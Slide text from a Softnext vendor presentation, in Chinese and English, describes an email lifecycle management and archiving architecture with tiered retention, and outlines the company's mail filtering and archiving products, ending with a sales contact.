Mail Lifecycle Management 運行架構 郵件生命週期管理 Mail Lifecycle Management 運行架構 MLM 規劃 Policy Center Daily backup Backup Policy On-line Archiving Center Backup Retrieve Email ILM Near-line Off-line (永久保存) (3個月) A 自動搬移 (1年內) B Delete (超過保存期限) 自動搬移 (3年內) C

Softnext－內容安全的最佳守護方案 Mail First Service Center Webmail/SMTP/POP3、Web/IM /P2P 全內容過濾紀錄 Switch Content SQR Firewall MSM MSM Email/Web/IM SPAM SQR Mail SQR expert Mail Archiving expert MySPAM MyMail Mail Server Mail Server 垃圾信過濾 病毒過濾 郵件稽核/政策化 管理 Email內容過濾 個人化郵件安 全管理服務 郵件歸檔及 復原 遵循法規

中華數位科技　董一中 leo@softnext-inc.com 02-25422526#251